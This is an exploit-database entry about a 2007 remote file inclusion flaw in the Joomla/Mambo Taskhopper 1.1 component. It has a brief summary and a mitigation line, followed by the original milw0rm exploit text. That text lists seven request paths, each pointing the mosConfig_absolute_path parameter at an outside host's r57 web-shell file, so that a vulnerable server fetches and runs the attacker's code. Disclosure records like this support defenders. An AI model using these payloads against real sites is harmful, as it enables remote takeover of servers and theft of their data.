header-logo
Suggest Exploit
vendor:
Taskhopper
by:
Cold z3ro
5.5
CVSS
MEDIUM
Remote File Inclusion
CWE
Product Name: Taskhopper
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Joomla/Mambo Component Taskhopper 1.1 RFI

The Joomla/Mambo Component Taskhopper 1.1 is vulnerable to Remote File Inclusion (RFI) attack. The vulnerability allows an attacker to include a remote file using the 'mosConfig_absolute_path' parameter in various PHP files.

Mitigation:

The vulnerability can be mitigated by validating user input and using proper input sanitization techniques to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

==================================================
Joomla/Mambo Component Taskhopper 1.1 (/inc/  mosConfig_absolute_path) RFI
==================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
==================================================
Homepage: www.Hack-Teach.com
==================================================
Script Site : http://taskhopper.com/One1
==================================================
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
==================================================


#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-10]